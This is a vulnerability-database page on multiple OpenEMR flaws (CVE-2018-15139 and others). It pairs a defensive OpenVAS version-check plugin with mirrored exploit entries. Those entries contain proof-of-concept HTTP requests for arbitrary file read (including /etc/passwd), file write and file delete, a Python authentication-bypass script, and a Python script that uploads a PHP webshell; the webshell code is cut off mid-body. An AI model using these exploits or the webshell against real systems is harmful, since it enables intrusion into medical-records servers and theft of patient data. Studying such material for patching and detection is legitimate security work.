DATABASE RESOURCES PRICING ABOUT US

{"id": "OPENVAS:1361412562310112356", "vendorId": null, "type": "openvas", "bulletinFamily": "scanner", "title": "OpenEMR < 5.0.1.4 Multiple Vulnerabilities", "description": "This host is running OpenEMR and is\n prone to multiple vulnerabilities.", "published": "2018-08-14T00:00:00", "modified": "2019-08-06T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112356", "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "references": ["https://www.databreaches.net/openemr-patches-serious-vulnerabilities-uncovered-by-project-insecurity/", "https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485", "https://github.com/openemr/openemr/pull/1765/files", "https://github.com/openemr/openemr/pull/1758/files", "https://www.open-emr.org/wiki/index.php/OpenEMR_Patches", "https://github.com/openemr/openemr/pull/1757/files", "https://insecurity.sh/reports/openemr.pdf"], "cvelist": ["CVE-2018-15139", "CVE-2018-15152", "CVE-2018-15155", "CVE-2018-15153", "CVE-2018-15144", "CVE-2018-15148", "CVE-2018-15149", "CVE-2018-15141", "CVE-2018-15145", "CVE-2018-15147", "CVE-2018-15143", "CVE-2018-15142", "CVE-2018-15140", "CVE-2018-15146", "CVE-2018-15150", "CVE-2018-15154", "CVE-2018-15151", "CVE-2018-15156"], "immutableFields": [], "lastseen": "2019-08-07T14:47:38", "viewCount": 52, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:488ABDDA-9BC6-4701-BDC0-E87692E75C17", "AKB:8B5B4AAA-0168-4A40-A5D1-C502E981E3D6", "AKB:C4DD3F24-796A-4A1A-8E1E-DE5E4F6D3E48"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0765"]}, {"type": "cve", "idList": ["CVE-2018-15139", "CVE-2018-15140", "CVE-2018-15141", "CVE-2018-15142", "CVE-2018-15143", "CVE-2018-15144", "CVE-2018-15145", "CVE-2018-15146", "CVE-2018-15147", "CVE-2018-15148", "CVE-2018-15149", "CVE-2018-15150", "CVE-2018-15151", "CVE-2018-15152", "CVE-2018-15153", "CVE-2018-15154", "CVE-2018-15155", "CVE-2018-15156"]}, {"type": "dsquare", "idList": ["E-656", "E-657", "E-658", "E-659"]}, {"type": "exploitdb", "idList": ["EDB-ID:45202", "EDB-ID:49998", "EDB-ID:50017", "EDB-ID:50122"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B98589463D012A2E1F0647C265D5BB55"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148956", "PACKETSTORM:163110", "PACKETSTORM:163181", "PACKETSTORM:163482"]}, {"type": "zdt", "idList": ["1337DAY-ID-30893", "1337DAY-ID-36407", "1337DAY-ID-36428", "1337DAY-ID-36549"]}], "rev": 4}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:8B5B4AAA-0168-4A40-A5D1-C502E981E3D6"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0765"]}, {"type": "cve", "idList": ["CVE-2018-15139", "CVE-2018-15140", "CVE-2018-15141", "CVE-2018-15142", "CVE-2018-15143", "CVE-2018-15144", "CVE-2018-15145", "CVE-2018-15146", "CVE-2018-15147", "CVE-2018-15148", "CVE-2018-15149", "CVE-2018-15150", "CVE-2018-15151", "CVE-2018-15152", "CVE-2018-15153", "CVE-2018-15154", "CVE-2018-15155", "CVE-2018-15156"]}, {"type": "dsquare", "idList": ["E-656", "E-657", "E-658", "E-659"]}, {"type": "exploitdb", "idList": ["EDB-ID:45202"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B98589463D012A2E1F0647C265D5BB55"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148956"]}, {"type": "zdt", "idList": ["1337DAY-ID-30893"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2018-15139", "epss": "0.930790000", "percentile": "0.984660000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15152", "epss": "0.143260000", "percentile": "0.948160000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15155", "epss": "0.002780000", "percentile": "0.633650000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15153", "epss": "0.953080000", "percentile": "0.988940000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15144", "epss": "0.001780000", "percentile": "0.532880000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15148", "epss": "0.001620000", "percentile": "0.510900000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15149", "epss": "0.001620000", "percentile": "0.510900000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15141", "epss": "0.002760000", "percentile": "0.631360000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15145", "epss": "0.001610000", "percentile": "0.509990000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15147", "epss": "0.001620000", "percentile": "0.510900000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15143", "epss": "0.001610000", "percentile": "0.509990000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15142", "epss": "0.018360000", "percentile": "0.864080000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15140", "epss": "0.007560000", "percentile": "0.781820000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15146", "epss": "0.001620000", "percentile": "0.510900000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15150", "epss": "0.001620000", "percentile": "0.510900000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15154", "epss": "0.002780000", "percentile": "0.633650000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15151", "epss": "0.001620000", "percentile": "0.510900000", "modified": "2023-03-15"}, {"cve": "CVE-2018-15156", "epss": "0.002780000", "percentile": "0.633650000", "modified": "2023-03-15"}], "vulnersScore": -0.2}, "_state": {"dependencies": 1678917980, "score": 1683995507, "epss": 1678938645}, "_internal": {"score_hash": "e2307137137fa0958cb01d7ad1f3f68c"}, "pluginID": "1361412562310112356", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# OpenEMR < 5.0.1.4 Multiple Vulnerabilities\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112356\");\n script_version(\"2019-08-06T09:01:24+0000\");\n script_cve_id(\"CVE-2018-15139\", \"CVE-2018-15140\", \"CVE-2018-15141\",\n \"CVE-2018-15142\", \"CVE-2018-15143\", \"CVE-2018-15144\", \"CVE-2018-15145\",\n \"CVE-2018-15146\", \"CVE-2018-15147\", \"CVE-2018-15148\", \"CVE-2018-15149\",\n \"CVE-2018-15150\", \"CVE-2018-15151\", \"CVE-2018-15152\", \"CVE-2018-15153\",\n \"CVE-2018-15154\", \"CVE-2018-15155\", \"CVE-2018-15156\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-08-06 09:01:24 +0000 (Tue, 06 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-08-14 09:22:33 +0200 (Tue, 14 Aug 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_name(\"OpenEMR < 5.0.1.4 Multiple Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running OpenEMR and is\n prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaws consist of multiple SQL injection vulnerabilities,\n directory traversal vulnerabilities, OS command injection vulnerabilities, an authentication bypass vulnerability\n and an unrestricted file upload vulnerability.\");\n\n script_tag(name:\"affected\", value:\"OpenEMR versions before 5.0.1.4\");\n\n script_tag(name:\"solution\", value:\"Upgrade to OpenEMR version 5.0.1.4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://www.databreaches.net/openemr-patches-serious-vulnerabilities-uncovered-by-project-insecurity/\");\n script_xref(name:\"URL\", value:\"https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485\");\n script_xref(name:\"URL\", value:\"https://github.com/openemr/openemr/pull/1765/files\");\n script_xref(name:\"URL\", value:\"https://github.com/openemr/openemr/pull/1758/files\");\n script_xref(name:\"URL\", value:\"https://github.com/openemr/openemr/pull/1757/files\");\n script_xref(name:\"URL\", value:\"https://insecurity.sh/reports/openemr.pdf\");\n script_xref(name:\"URL\", value:\"https://www.open-emr.org/wiki/index.php/OpenEMR_Patches\");\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_openemr_detect.nasl\");\n script_mandatory_keys(\"openemr/installed\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nCPE = \"cpe:/a:open-emr:openemr\";\n\nif( ! port = get_app_port( cpe: CPE ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[ 'version' ];\nlocation = infos[ 'location' ];\n\nif( version_is_less( version: version, test_version: \"5.0.1-4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"5.0.1-4\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "naslFamily": "Web application abuses"}

{"exploitpack": [{"lastseen": "2020-04-01T19:04:38", "description": "\nOpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-16T00:00:00", "type": "exploitpack", "title": "OpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15141", "CVE-2018-15142", "CVE-2018-15140"], "modified": "2018-08-16T00:00:00", "id": "EXPLOITPACK:B98589463D012A2E1F0647C265D5BB55", "href": "", "sourceData": "# Exploit Title: OpenEMR 5.0.1.3 - Arbitrary File Actions \n# Date: 2018-08-14\n# Exploit Author: Joshua Fam\n# Twitter : @Insecurity\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz\n# Version: < 5.0.1.3 \n# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3\n# CVE : CVE-2018-15142,CVE-2018-15141,CVE-2018-15140\n\n# 1.Arbitrary File Read:\n# In OpenEmr a user that has access to the portal can send a malcious \n# POST request to read arbitrary files.\n\n# i.Vulnerable Code: \n# if ($_POST['mode'] == 'get') {\n# echo file_get_contents($_POST['docid']);\n# exit;\n# }\n\n# ii. Proof of Concept:\nPOST /openemr/portal/import_template.php HTTP/1.1\nHost: hostname\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 26\n\nmode=get&docid=/etc/passwd\n\n# 2.Arbitrary File Write:\n# In OpenEmr a user that has access to the portal can send a malcious \n# POST request to write arbitrary files.\n \n# i. Vulnerable Code: \n# } else if ($_POST['mode'] == 'save') {\n# file_put_contents($_POST['docid'], $_POST['content']);\n# exit(true);\n# }\n \n# ii. Proof of Concept:\nPOST /openemr/portal/import_template.php HTTP/1.1\nHost: hostname\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 54\n\nmode=save&docid=payload.php&content=<?php phpinfo();?>\n\n# After sending this navigate to payload.php at http://hostname/openemr/portal\n\n# 3. Arbitrary File Delete:\n# In OpenEmr a user that has access to the portal can send a malcious \n# POST request to delete a arbitrary file.\n \n# i. Vulnerable Code: \n# } else if ($_POST['mode'] == 'delete') {\n# unlink($_POST['docid']);\n# exit(true);\n# }\n \n# ii. Proof of Concept: \nPOST /openemr/portal/import_template.php HTTP/1.1\nHost: 127.0.0.1\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 29\n\nmode=delete&docid=payload.php\n \n# After completing this request, when you navigate to payload.php, you should be greeted by a 404 page.", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-08-18T01:54:28", "description": "", "cvss3": {}, "published": "2018-08-16T00:00:00", "type": "packetstorm", "title": "OpenEMR 5.0.1.3 File Read / Write / Delete", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-15141", "CVE-2018-15142", "CVE-2018-15140"], "modified": "2018-08-16T00:00:00", "id": "PACKETSTORM:148956", "href": "https://packetstormsecurity.com/files/148956/OpenEMR-5.0.1.3-File-Read-Write-Delete.html", "sourceData": "`# Exploit Title: OpenEMR 5.0.1.3 - Arbitrary File Actions \n# Date: 2018-08-14 \n# Exploit Author: Joshua Fam \n# Twitter : @Insecurity \n# Vendor Homepage: https://www.open-emr.org/ \n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz \n# Version: < 5.0.1.3 \n# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3 \n# CVE : CVE-2018-15142,CVE-2018-15141,CVE-2018-15140 \n \n# 1.Arbitrary File Read: \n# In OpenEmr a user that has access to the portal can send a malcious \n# POST request to read arbitrary files. \n \n# i.Vulnerable Code: \n# if ($_POST['mode'] == 'get') { \n# echo file_get_contents($_POST['docid']); \n# exit; \n# } \n \n# ii. Proof of Concept: \nPOST /openemr/portal/import_template.php HTTP/1.1 \nHost: hostname \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs \nConnection: close \nUpgrade-Insecure-Requests: 1 \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 26 \n \nmode=get&docid=/etc/passwd \n \n# 2.Arbitrary File Write: \n# In OpenEmr a user that has access to the portal can send a malcious \n# POST request to write arbitrary files. \n \n# i. Vulnerable Code: \n# } else if ($_POST['mode'] == 'save') { \n# file_put_contents($_POST['docid'], $_POST['content']); \n# exit(true); \n# } \n \n# ii. Proof of Concept: \nPOST /openemr/portal/import_template.php HTTP/1.1 \nHost: hostname \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs \nConnection: close \nUpgrade-Insecure-Requests: 1 \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 54 \n \nmode=save&docid=payload.php&content=<?php phpinfo();?> \n \n# After sending this navigate to payload.php at http://hostname/openemr/portal \n \n# 3. Arbitrary File Delete: \n# In OpenEmr a user that has access to the portal can send a malcious \n# POST request to delete a arbitrary file. \n \n# i. Vulnerable Code: \n# } else if ($_POST['mode'] == 'delete') { \n# unlink($_POST['docid']); \n# exit(true); \n# } \n \n# ii. Proof of Concept: \nPOST /openemr/portal/import_template.php HTTP/1.1 \nHost: 127.0.0.1 \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs \nConnection: close \nUpgrade-Insecure-Requests: 1 \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 29 \n \nmode=delete&docid=payload.php \n \n# After completing this request, when you navigate to payload.php, you should be greeted by a 404 page. \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148956/openemr5013-filereadwritedelete.txt"}, {"lastseen": "2021-06-17T18:43:37", "description": "", "cvss3": {}, "published": "2021-06-17T00:00:00", "type": "packetstorm", "title": "OpenEMR 5.0.1.3 Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-15152"], "modified": "2021-06-17T00:00:00", "id": "PACKETSTORM:163181", "href": "https://packetstormsecurity.com/files/163181/OpenEMR-5.0.1.3-Authentication-Bypass.html", "sourceData": "`# Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass \n# Date 15.06.2021 \n# Exploit Author: Ron Jost (Hacker5preme) \n# Vendor Homepage: https://www.open-emr.org/ \n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip \n# Version: All versions prior to 5.0.1.4 \n# Tested on: Ubuntu 18.04 \n# CVE: CVE-2018-15152 \n# CWE: CWE-287 \n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit \n \n''' \nDescription: \nAn unauthenticated user is able to bypass the Patient Portal Login by simply navigating to \nthe registration page and modifying the requested url to access the desired page. Some \nexamples of pages in the portal directory that are accessible after browsing to the \nregistration page include: \n- add_edit_event_user.php \n- find_appt_popup_user.php \n- get_allergies.php \n- get_amendments.php \n- get_lab_results.php \n- get_medications.php \n- get_patient_documents.php \n- get_problems.php \n- get_profile.php \n- portal_payment.php \n- messaging/messages.php \n- messaging/secure_chat.php \n- report/pat_ledger.php \n- report/portal_custom_report.php \n- report/portal_patient_report.php \nNormally, access to these pages requires authentication as a patient. If a user were to visit \nany of those pages unauthenticated, they would be redirected to the login page. \n''' \n \n \n''' \nImport required modules: \n''' \nimport requests \nimport argparse \n \n \n''' \nUser-Input: \n''' \nmy_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass') \nmy_parser.add_argument('-T', '--IP', type=str) \nmy_parser.add_argument('-P', '--PORT', type=str) \nmy_parser.add_argument('-U', '--Openemrpath', type=str) \nmy_parser.add_argument('-R', '--PathToGet', type=str) \nargs = my_parser.parse_args() \ntarget_ip = args.IP \ntarget_port = args.PORT \nopenemr_path = args.Openemrpath \npathtoread = args.PathToGet \n \n \n''' \nCheck for vulnerability: \n''' \n# Check, if Registration portal is enabled. If it is not, this exploit can not work \nsession = requests.Session() \ncheck_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php' \ncheck_vuln = session.get(check_vuln_url).text \nprint('') \nprint('[*] Checking vulnerability: ') \nprint('') \n \nif \"Enter email address to receive registration.\" in check_vuln: \nprint('[+] Host Vulnerable. Proceeding exploit') \nelse: \nprint('[-] Host is not Vulnerable: Registration for patients is not enabled') \n \n''' \nExploit: \n''' \nheader = { \n'Referer': check_vuln_url \n} \nexploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread \nExploit = session.get(exploit_url, headers=header) \nprint('') \nprint('[+] Results: ') \nprint('') \nprint(Exploit.text) \nprint('') \n \n \n \n`\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/163181/openemr5013-bypass.txt"}, {"lastseen": "2021-06-14T16:03:07", "description": "", "cvss3": {}, "published": "2021-06-14T00:00:00", "type": "packetstorm", "title": "OpenEMR 5.0.1.3 Shell Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-15139"], "modified": "2021-06-14T00:00:00", "id": "PACKETSTORM:163110", "href": "https://packetstormsecurity.com/files/163110/OpenEMR-5.0.1.3-Shell-Upload.html", "sourceData": "`# Exploit Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) \n# Date 12.06.2021 \n# Exploit Author: Ron Jost (Hacker5preme) \n# Vendor Homepage: https://www.open-emr.org/ \n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip \n# Version: Prior to 5.0.1.4 \n# Tested on: Ubuntu 18.04 \n# CVE: CVE-2018-15139 \n# CWE: CWE-434 \n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15139 \n \n''' \nDescription: \nUnrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote \nauthenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload \nform and accessing it in the images directory. \n''' \n \n \n''' \nBanner: \n''' \nbanner =\"\"\" \n___ _____ __ __ ____ ____ ___ _ _____ \n/ _ \\ _ __ ___ _ __ | ____| \\/ | _ \\ | ___| / _ \\ / | |___ / \n| | | | '_ \\ / _ \\ '_ \\| _| | |\\/| | |_) | _____ |___ \\| | | || | |_ \\ \n| |_| | |_) | __/ | | | |___| | | | _ < |_____| ___) | |_| || |_ ___) | \n\\___/| .__/ \\___|_| |_|_____|_| |_|_| \\_\\ |____(_)___(_)_(_)____/ \n|_| \n \n_____ _ _ _ \n| ____|_ ___ __ | | ___ (_) |_ \n| _| \\ \\/ / '_ \\| |/ _ \\| | __| \n| |___ > <| |_) | | (_) | | |_ \n|_____/_/\\_\\ .__/|_|\\___/|_|\\__| \n|_| \n \n\"\"\" \nprint(banner) \n \n \n''' \nImport required modules \n''' \nimport argparse \nimport requests \n \n \n''' \nUser-Input: \n''' \nmy_parser = argparse.ArgumentParser(description='OpenEMR Remote Code Execution') \nmy_parser.add_argument('-T', '--IP', type=str) \nmy_parser.add_argument('-P', '--PORT', type=str) \nmy_parser.add_argument('-U', '--PATH', type=str) \nmy_parser.add_argument('-u', '--USERNAME', type=str) \nmy_parser.add_argument('-p', '--PASSWORD', type=str) \nargs = my_parser.parse_args() \ntarget_ip = args.IP \ntarget_port = args.PORT \nopenemr_path = args.PATH \nusername = args.USERNAME \npassword = args.PASSWORD \n \n''' \nAuthentication: \n''' \n# Preparation: \nsession = requests.Session() \nauth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default' \nauth_chek_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/login/login.php?site=default' \nresponse = session.get(auth_chek_url) \n \n# Header (auth): \nheader = { \n'Host': target_ip, \n'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', \n'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', \n'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', \n'Accept-Encoding': 'gzip, deflate', \n'Content-Type': 'application/x-www-form-urlencoded', \n'Origin': 'http://' + target_ip, \n'Connection': 'close', \n'Referer': auth_chek_url, \n'Upgrade-Insecure-Requests': '1', \n} \n \n# Body (auth): \nbody = { \n'new_login_session_management': '1', \n'authProvider': 'Default', \n'authUser': username, \n'clearPass': password, \n'languageChoice': '1' \n} \n \n# Authentication: \nprint('') \nprint('[+] Authentication') \nauth = session.post(auth_url,headers=header, data=body) \n \n \n''' \nExploit: \n''' \nprint('') \nprint('[+] Uploading Webshell:') \n \n# URL: \nexploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php' \n \n# Headers (Exploit): \nheader = { \n\"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0\", \n\"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \n\"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\", \n\"Accept-Encoding\": \"gzip, deflate\", \n\"Content-Type\": \"multipart/form-data; boundary=---------------------------31900464228840324774249185339\", \n\"Origin\": \"http://\" + target_ip, \n\"Connection\": \"close\", \n\"Referer\": 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php', \n\"Upgrade-Insecure-Requests\": \"1\" \n} \n \n# Body (Exploit): \nbody = \"-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_filename\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_filedata\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"MAX_FILE_SIZE\\\"\\r\\n\\r\\n12000000\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_image\\\"; filename=\\\"shell.php\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n<?php\\n\\nfunction featureShell($cmd, $cwd) {\\n $stdout = array();\\n\\n if (preg_match(\\\"/^\\\\s*cd\\\\s*$/\\\", $cmd)) {\\n // pass\\n } elseif (preg_match(\\\"/^\\\\s*cd\\\\s+(.+)\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*cd\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n chdir($match[1]);\\n } elseif (preg_match(\\\"/^\\\\s*download\\\\s+[^\\\\s]+\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*download\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n return featureDownload($match[1]);\\n } else {\\n chdir($cwd);\\n exec($cmd, $stdout);\\n }\\n\\n return array(\\n \\\"stdout\\\" => $stdout,\\n \\\"cwd\\\" => getcwd()\\n );\\n}\\n\\nfunction featurePwd() {\\n return array(\\\"cwd\\\" => getcwd());\\n}\\n\\nfunction featureHint($fileName, $cwd, $type) {\\n chdir($cwd);\\n if ($type == 'cmd') {\\n $cmd = \\\"compgen -c $fileName\\\";\\n } else {\\n $cmd = \\\"compgen -f $fileName\\\";\\n }\\n $cmd = \\\"/bin/bash -c \\\\\\\"$cmd\\\\\\\"\\\";\\n $files = explode(\\\"\\\\n\\\", shell_exec($cmd));\\n return array(\\n 'files' => $files,\\n );\\n}\\n\\nfunction featureDownload($filePath) {\\n $file = @file_get_contents($filePath);\\n if ($file === FALSE) {\\n return array(\\n 'stdout' => array('File not found / no read permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n return array(\\n 'name' => basename($filePath),\\n 'file' => base64_encode($file)\\n );\\n }\\n}\\n\\nfunction featureUpload($path, $file, $cwd) {\\n chdir($cwd);\\n $f = @fopen($path, 'wb');\\n if ($f === FALSE) {\\n return array(\\n 'stdout' => array('Invalid path / no write permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n fwrite($f, base64_decode($file));\\n fclose($f);\\n return array(\\n 'stdout' => 